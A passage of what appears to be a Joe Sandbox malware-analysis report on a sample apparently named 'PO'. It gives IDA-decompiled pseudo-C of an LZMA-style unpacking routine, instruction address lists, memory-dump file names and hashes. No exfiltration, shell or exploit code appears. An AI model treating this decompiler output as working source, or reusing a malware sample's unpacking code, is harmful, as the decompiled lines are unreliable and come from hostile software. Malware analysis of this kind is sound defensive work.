											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}

0x00406c7b
0x00406c7b
0x00406c7b
0x00406c7b
0x00406c81
0x00406c85
0x00406c89
0x00406c93
0x00406ca1
0x00406f77
0x00406f77
0x00406f7a
0x00406f81
0x00406fae
0x00406fae
0x00406fb2
0x00000000
0x00000000
0x00406fb4
0x00406fbd
0x00406fc3
0x00406fc6
0x00406fc9
0x00406fcc
0x00406fcf
0x00406fd5
0x00406fee
0x00406ff1
0x00406ffd
0x00406ffe
0x00407001
0x00406fd7
0x00406fd7
0x00406fe6
0x00406fe9
0x00406fe9
0x0040700b
0x00406fab
0x00406fab
0x00406fab
0x00406fae
0x00406fb2
0x00000000
0x00000000
0x00000000
0x0040700d
0x0040700d
0x00406f86
0x00406f8a
0x004070c2
0x004070c2
0x004070cc
0x004070d4
0x004070db
0x004070dd
0x004070e4
0x004070e8
0x004070e8
0x00406f90
0x00406f96
0x00406f9d
0x00406fa5
0x00406fa5
0x00406fa8
0x00000000
0x00406fa8
0x00407012
0x0040701f
0x00407022
0x00406f2e
0x00406f2e
0x00406f2e
0x004066ca
0x004066ca
0x004066ca
0x004066d3
0x00000000
0x00000000
0x004066d9
0x004066d9
0x00000000
0x004066e0
0x004066e4
0x00000000
0x00000000
0x004066ea
0x004066ed
0x004066f0
0x004066f3
0x004066f7
0x00000000
0x00000000
0x004066fd
0x004066fd
0x00406700
0x00406702
0x00406703
0x00406706
0x00406708
0x00406709
0x0040670b
0x0040670e
0x00406713
0x00406718
0x00406721
0x00406734
0x00406737
0x00406743
0x0040676b
0x0040676d
0x0040677b
0x0040677b
0x0040677f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040676f
0x0040676f
0x00406772
0x00406773
0x00406773
0x00000000
0x0040676f
0x00406745
0x00406749
0x0040674e
0x0040674e
0x00406757
0x0040675f
0x00406762
0x00000000
0x00406768
0x00406768
0x00000000
0x00406768
0x00000000
0x00406785
0x00406785
0x00406789
0x00407035
0x00407035
0x00000000
0x00407035
0x0040678f
0x00406792
0x004067a2
0x004067a5
0x004067a8
0x004067a8
0x004067a8
0x004067ab
0x004067af
0x00000000
0x00000000
0x004067b1
0x004067b1
0x004067b7
0x004067e1
0x004067e7
0x004067ee
0x00000000
0x004067ee
0x004067b9
0x004067bd
0x004067c0
0x004067c5
0x004067c5
0x004067d0
0x004067d8
0x004067db
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406820
0x00406826
0x00406829
0x00406836
0x0040683e
0x00000000
0x00000000
0x004067f5
0x004067f5
0x004067f9
0x00407044
0x00407044
0x00000000
0x00407044
0x004067ff
0x00406805
0x00406810
0x00406810
0x00406810
0x00406813
0x00406816
0x00406819
0x0040681e
0x00000000
0x00000000
0x00000000
0x00000000
0x00406eb5
0x00406eb5
0x00406ebb
0x00406ec1
0x00406ec7
0x00406ee1
0x00406ee4
0x00406eea
0x00406ef5
0x00406ef5
0x00406ef7
0x00406ec9
0x00406ec9
0x00406ed8
0x00406edc
0x00406edc
0x00406f01
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406f03
0x00406f07
0x004070b6
0x004070b6
0x00000000
0x004070b6
0x00406f0d
0x00406f13
0x00406f1a
0x00406f22
0x00406f25
0x00406f28
0x00406f28
0x00406f2e
0x00406f2e
0x00000000
0x00000000
0x00406846
0x00406846
0x00406848
0x0040684b
0x004068bc
0x004068bc
0x004068bf
0x004068c2
0x004068c9
0x004068d3
0x00000000
0x004068d3
0x0040684d
0x0040684d
0x00406851
0x00406854
0x00406856
0x00406859
0x0040685c
0x0040685e
0x00406861
0x00406863
0x00406868
0x0040686b
0x0040686e
0x00406872
0x00406879
0x0040687c
0x00406883
0x00406887
0x0040688f
0x0040688f
0x0040688f
0x00406889
0x00406889
0x00406889
0x0040687e
0x0040687e
0x0040687e
0x00406893
0x00406896
0x004068b4
0x004068b4
0x004068b6
0x00000000
0x00406898
0x00406898
0x00406898
0x0040689b
0x0040689e
0x004068a1
0x004068a3
0x004068a3
0x004068a3
0x004068a6
0x004068a9
0x004068ab
0x004068ac
0x004068af
0x00000000
0x004068af
0x00000000
0x00406ae5
0x00406ae5
0x00406ae9
0x00406b07
0x00406b07
0x00406b0a
0x00406b11
0x00406b14
0x00406b17
0x00406b1a
0x00406b1d
0x00406b20
0x00406b22
0x00406b29
0x00406b2a
0x00406b2c
0x00406b2f
0x00406b32
0x00406b35
0x00406b35
0x00406b3a
0x00000000
0x00406b3a
0x00406aeb
0x00406aeb
0x00406aee
0x00406af1
0x00406afb
0x00000000
0x00000000
0x00406b4f
0x00406b4f
0x00406b53
0x00406b76
0x00406b79
0x00406b7c
0x00406b86
0x00406b55
0x00406b55
0x00406b58
0x00406b5b
0x00406b5e
0x00406b6b
0x00406b6e
0x00406b6e
0x00000000
0x00000000
0x00406b92
0x00406b92
0x00406b96
0x00000000
0x00000000
0x00406b9c
0x00406b9c
0x00406ba0
0x00000000
0x00000000
0x00406ba6
0x00406ba6
0x00406ba8
0x00406bac
0x00406bac
0x00406baf
0x00406bb3
0x00000000
0x00000000
0x00406c03
0x00406c03
0x00406c07
0x00406c0e
0x00406c0e
0x00406c11
0x00406c14
0x00406c1e
0x00000000
0x00406c1e
0x00406c09
0x00406c09
0x00000000
0x00000000
0x00406c2a
0x00406c2a
0x00406c2e
0x00406c35
0x00406c38
0x00406c3b
0x00406c30
0x00406c30
0x00406c30
0x00406c3e
0x00406c41
0x00406c44
0x00406c44
0x00406c47
0x00406c4a
0x00406c4d
0x00406c4d
0x00406c50
0x00406c57
0x00406c5c
0x00000000
0x00000000
0x00406cea
0x00406cea
0x00406cee
0x0040708c
0x0040708c
0x00000000
0x0040708c
0x00406cf4
0x00406cf4
0x00406cf7
0x00406cfa
0x00406cfe
0x00406d01
0x00406d07
0x00406d09
0x00406d09
0x00406d09
0x00406d0c
0x00406d0f
0x00000000
0x00000000
0x004068df
0x004068df
0x004068e3
0x00407050
0x00407050
0x00000000
0x00407050
0x004068e9
0x004068e9
0x004068ec
0x004068ef
0x004068f3
0x004068f6
0x004068fc
0x004068fe
0x004068fe
0x004068fe
0x00406901
0x00406904
0x00406904
0x00406907
0x0040690a
0x00000000
0x00000000
0x00406910
0x00406910
0x00406916
0x00000000
0x00000000
0x0040691c
0x0040691c
0x00406920
0x00406923
0x00406926
0x00406929
0x0040692c
0x0040692d
0x00406930
0x00406932
0x00406938
0x0040693b
0x0040693e
0x00406941
0x00406944
0x00406947
0x0040694a
0x00406966
0x00406969
0x0040696c
0x0040696f
0x00406976
0x0040697a
0x0040697c
0x00406980
0x0040694c
0x0040694c
0x00406950
0x00406958
0x0040695d
0x0040695f
0x00406961
0x00406961
0x00406983
0x0040698a
0x0040698d
0x00000000
0x00406993
0x00406993
0x00000000
0x00406993
0x00000000
0x00406998
0x00406998
0x0040699c
0x0040705c
0x0040705c
0x00000000
0x0040705c
0x004069a2
0x004069a2
0x004069a5
0x004069a8
0x004069ac
0x004069af
0x004069b5
0x004069b7
0x004069b7
0x004069b7
0x004069ba
0x004069bd
0x004069bd
0x004069bd
0x004069c3
0x00000000
0x00000000
0x004069c5
0x004069c5
0x004069c8
0x004069cb
0x004069ce
0x004069d1
0x004069d4
0x004069d7
0x004069da
0x004069dd
0x004069e0
0x004069e3
0x004069fb
0x004069fe
0x00406a01
0x00406a04
0x00406a04
0x00406a07
0x00406a0b
0x00406a0d
0x004069e5
0x004069e5
0x004069ed
0x004069f2
0x004069f4
0x004069f6
0x004069f6
0x00406a10
0x00406a17
0x00406a1a
0x00000000
0x00406a1c
0x00406a1c
0x00000000
0x00406a1c
0x00406a1a
0x00406a21
0x00406a21
0x00406a21
0x00406a21
0x00000000
0x00000000
0x00406a5c
0x00406a5c
0x00406a60
0x00407068
0x00407068
0x00000000
0x00407068
0x00406a66
0x00406a66
0x00406a69
0x00406a6c
0x00406a70
0x00406a73
0x00406a79
0x00406a7b
0x00406a7b
0x00406a7b
0x00406a7e
0x00406a81
0x00406a81
0x00406a87
0x00406a25
0x00406a25
0x00406a28
0x00000000
0x00406a28
0x00406a89
0x00406a89
0x00406a8c
0x00406a8f
0x00406a92
0x00406a95
0x00406a98
0x00406a9b
0x00406a9e
0x00406aa1
0x00406aa4
0x00406aa7
0x00406abf
0x00406ac2
0x00406ac5
0x00406ac8
0x00406ac8
0x00406acb
0x00406acf
0x00406ad1
0x00406aa9
0x00406aa9
0x00406ab1
0x00406ab6
0x00406ab8
0x00406aba
0x00406aba
0x00406ad4
0x00406adb
0x00406ade
0x00000000
0x00406ae0
0x00406ae0
0x00000000
0x00406ae0
0x00000000
0x00406d6d
0x00406d6d
0x00406d71
0x00407098
0x00407098
0x00000000
0x00407098
0x00406d77
0x00406d77
0x00406d7a
0x00406d7d
0x00406d81
0x00406d84
0x00406d8a
0x00406d8c
0x00406d8c
0x00406d8c
0x00406d8f
0x00000000
0x00000000
0x00406b3d
0x00406b3d
0x00406b40
0x00000000
0x00000000
0x00406e7c
0x00406e7c
0x00406e80
0x00406ea2
0x00406ea2
0x00406ea5
0x00406eaf
0x00406eb2
0x00406eb2
0x00000000
0x00406eb2
0x00406e82
0x00406e82
0x00406e85
0x00406e89
0x00406e8c
0x00406e8c
0x00406e8f
0x00000000
0x00000000
0x00406f39
0x00406f39
0x00406f3d
0x00406f5b
0x00406f5b
0x00406f5b
0x00406f5b
0x00406f62
0x00406f69
0x00406f70
0x00406f70
0x00406f77
0x00406f7a
0x00406f81
0x00000000
0x00406f84
0x00406f3f
0x00406f3f
0x00406f42
0x00406f45
0x00406f48
0x00406f4f
0x00406e93
0x00406e93
0x00406e96
0x00000000
0x00000000
0x0040702a
0x0040702a
0x0040702d
0x00406f2e
0x00406f2e
0x00406f2e
0x00000000
0x00406f34
0x00000000
0x00406c64
0x00406c64
0x00406c66
0x00406c6d
0x00406c6e
0x00406c70
0x00406c73
0x00000000
0x00000000
0x00000000
0x00000000
0x00406f77
0x00406f77
0x00406f7a
0x00406f81
0x00000000
0x00406f84
0x00000000
0x00000000
0x00000000
0x00406ca9
0x00406ca9
0x00406cac
0x00406ce2
0x00406ce2
0x00406e12
0x00406e12
0x00406e12
0x00406e12
0x00406e15
0x00406e15
0x00406e18
0x00406e1a
0x004070a4
0x004070a4
0x00000000
0x004070a4
0x00406e20
0x00406e20
0x00406e23
0x00000000
0x00000000
0x00406e29
0x00406e29
0x00406e2d
0x00406e30
0x00406e30
0x00406e30
0x00000000
0x00406e30
0x00406cae
0x00406cae
0x00406cb0
0x00406cb2
0x00406cb4
0x00406cb7
0x00406cb8
0x00406cba
0x00406cbc
0x00406cbf
0x00406cc2
0x00406cd8
0x00406cd8
0x00406cdd
0x00406d15
0x00406d15
0x00406d19
0x00406d42
0x00406d45
0x00406d47
0x00406d4e
0x00406d51
0x00406d54
0x00406d54
0x00406d59
0x00406d59
0x00406d5b
0x00406d5e
0x00406d65
0x00406d68
0x00406d95
0x00406d95
0x00406d98
0x00406d9b
0x00406e0f
0x00406e0f
0x00406e0f
0x00406e0f
0x00000000
0x00406e0f
0x00406d9d
0x00406d9d
0x00406da3
0x00406da6
0x00406da9
0x00406dac
0x00406daf
0x00406db2
0x00406db5
0x00406db8
0x00406dbb
0x00406dbe
0x00406dd7
0x00406dd9
0x00406ddc
0x00406ddd
0x00406de0
0x00406de2
0x00406de5
0x00406de7
0x00406de9
0x00406dec
0x00406dee
0x00406df1
0x00406df5
0x00406df7
0x00406df7
0x00406df8
0x00406dfb
0x00406dfe
0x00406dc0
0x00406dc0
0x00406dc8
0x00406dcd
0x00406dcf
0x00406dd2
0x00406dd2
0x00406e01
0x00406e08
0x00406d92
0x00406d92
0x00406d92
0x00406d92
0x00000000
0x00406e0a
0x00406e0a
0x00000000
0x00406e0a
0x00406e08
0x00406d1b
0x00406d1b
0x00406d1e
0x00406d20
0x00406d23
0x00406d26
0x00406d29
0x00406d2b
0x00406d2e
0x00406d31
0x00406d31
0x00406d34
0x00406d34
0x00406d37
0x00406d3e
0x00406d12
0x00406d12
0x00406d12
0x00406d12
0x00000000
0x00406d40
0x00406d40
0x00000000
0x00406d40
0x00406d3e
0x00406cc4
0x00406cc4
0x00406cc7
0x00406cc9
0x00406ccc
0x00000000
0x00000000
0x00406a2b
0x00406a2b
0x00406a2f
0x00407074
0x00407074
0x00000000
0x00407074
0x00406a35
0x00406a35
0x00406a38
0x00406a3b
0x00406a3e
0x00406a41
0x00406a44
0x00406a47
0x00406a49
0x00406a4c
0x00406a4f
0x00406a52
0x00406a54
0x00406a54
0x00406a54
0x00000000
0x00000000
0x00406bb6
0x00406bb6
0x00406bba
0x00407080
0x00407080
0x00000000
0x00407080
0x00406bc0
0x00406bc0
0x00406bc3
0x00406bc6
0x00406bc9
0x00406bcb
0x00406bcb
0x00406bcb
0x00406bce
0x00406bd1
0x00406bd4
0x00406bd7
0x00406bda
0x00406bdd
0x00406bde
0x00406be0
0x00406be0
0x00406be0
0x00406be3
0x00406be6
0x00406be9
0x00406bec
0x00406bec
0x00406bec
0x00406bef
0x00406bf1
0x00406bf1
0x00000000
0x00000000
0x00406e33
0x00406e33
0x00406e33
0x00406e37
0x00000000
0x00000000
0x00406e3d
0x00406e3d
0x00406e40
0x00406e43
0x00406e46
0x00406e48
0x00406e48
0x00406e48
0x00406e4b
0x00406e4e
0x00406e51
0x00406e54
0x00406e57
0x00406e5a
0x00406e5b
0x00406e5d
0x00406e5d
0x00406e5d
0x00406e60
0x00406e63
0x00406e66
0x00406e69
0x00406e6c
0x00406e70
0x00406e72
0x00406e75
0x00000000
0x00406e77
0x00406e77
0x00406bf4
0x00406bf4
0x00000000
0x00406bf4
0x00406e75
0x004070aa
0x004070aa
0x00000000
0x00000000
0x004066d9
0x004070e1
0x004070e1
0x00000000
0x004070e1
0x00406f2e
0x00406fae
0x00406f77

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6748365695d0b60958ae2de605dce3010a9a46cb287cd8314348fa6e45a6e7ef
Instruction ID: 95c87b37ce546c92696c349aad8761a6baa0f42cb897a758cf539d426e2a5a70
Opcode Fuzzy Hash: 6748365695d0b60958ae2de605dce3010a9a46cb287cd8314348fa6e45a6e7ef
Instruction Fuzzy Hash: 65A13471D00229CBDF28CFA8C844AADBBB1FF44305F15816AD956BB281D7785A86DF44

Uniqueness

Uniqueness Score: -1.00%

Function 00406E7C Relevance: 5.2, APIs: 4, Instructions: 208
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406E7C() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004070E9))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
